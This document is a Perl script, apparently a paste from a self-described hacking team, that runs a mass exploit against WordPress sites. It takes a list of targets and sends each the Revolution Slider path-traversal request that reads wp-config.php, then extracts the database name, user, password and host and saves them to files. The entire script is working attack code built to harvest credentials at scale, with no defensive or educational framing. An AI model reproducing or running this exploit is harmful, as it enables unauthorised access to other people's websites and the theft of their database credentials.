for mgl

1.  
2. #!/usr/bin/perl
3. # *** Brazilians Hackers Team ***
4. # https://pastebin.com/u/brazilobscure1
5.  
6. use Win32::Console::ANSI;
7. use Term::ANSIColor;
8. use LWP::UserAgent;
9.  
10. system(($^O eq 'MSWin32') ? 'cls' : 'clear');
11. my $script = 'MASS REVSLIDER';
12. $res="Result";
13. if (-e $res)
14. {
15. }
16. else
17. {
18. mkdir $res or die "Nao Foi Possivel Criar Diretorio: $res";
19. }
20.  
21. print "\n";
22. print colored ( " --=[Exploit Mass Revslider Get Config]=-- ",'bold on_green'),"\n";
23. print colored ( " --=[*** Brazilians Hackers Team ***]=-- ",'bold on_green'),"\n";
24. print"\n";
25.  
26. print "\n";
27.  
28. print colored ("LISTA DE SITES:",'bold on_yellow ')," ";
29.  
30. chomp(my $lista=<STDIN>);
31. open (my $lista,'<',$lista) || die "\n [Lista Nao Encontrada]";
32. my @lista = <$lista>;
33.  
34. foreach $site(@lista) {
35.  
36. if($site !~ /http:\/\//) { $site = "http://$site"; };
37. getconfig ();
38. }
39. sub getconfig{
40. print colored ("\nTESTANDO SITE ==> $site",'bold on_blue'),"";
41.  
42. $ua = LWP::UserAgent->new(keep_alive => 1);
43. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
44. $ua->timeout (10);
45.  
46. $config = "wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php";
47. $conflink = "$site/$config";
48. $resp = $ua->request(HTTP::Request->new(GET => $conflink ));
49. $conttt = $resp->content;
50.  
51. if($conttt =~ m/DB_NAME/g){
52. open(save, '>>Result/Vulneraveis.txt');
53. print save "[rev confg] $site\n";
54. close(save);
55. $resp = $ua->request(HTTP::Request->new(GET => $conflink ));
56. $cont = $resp->content;
57. print colored ("[EXTRAINDO INFORMACAO]",'bold on_green'),"\n";sleep(1);
58. while($cont =~ m/DB_NAME/g){
59.  
60.  
61. if ($cont =~ /DB_NAME\', \'(.*)\'\)/){
62. print color("bold on_red"),"[-]Database Name = $1 \n";
63. print color 'reset';
64. open (TEXT, '>>Result/databases.txt');
65. print TEXT "\n[ DATABASE ] \n$site\n[-]Database Name = $1";
66. close (TEXT);
67. }
68. if ($cont =~ /DB_USER\', \'(.*)\'\)/){
69. print color("bold on_yellow"),"[-]Database User = $1 \n";
70. print color 'reset';
71. open (TEXT, '>>Result/databases.txt');
72. print TEXT "\n[-]Database User = $1";
73. close (TEXT)
74. }
75. if ($cont =~ /DB_PASSWORD\', \'(.*)\'\)/){
76. print color("bold on_red"),"[-]Database Password = $1 \n";
77. print color 'reset';
78. $pass= $1 ;
79. open (TEXT, '>>Result/databases.txt');
80. print TEXT "\nDatabase Password = $pass";
81. close (TEXT)
82. }
83. if ($cont =~ /DB_HOST\', \'(.*)\'\)/){
84. print color("bold on_yellow"),"[-]Database Host = $1 \n";
85. print color 'reset';
86. open (TEXT, '>>Result/databases.txt');
87. print TEXT "\n[-]Database Host = $1";
88. close (TEXT)
89. }
90.  
91. }
92. }else{
93. print colored ("[NAO VULNERAVEL]",'bold on_red'),"";
94.  
95.  
96. }
97.  
98. }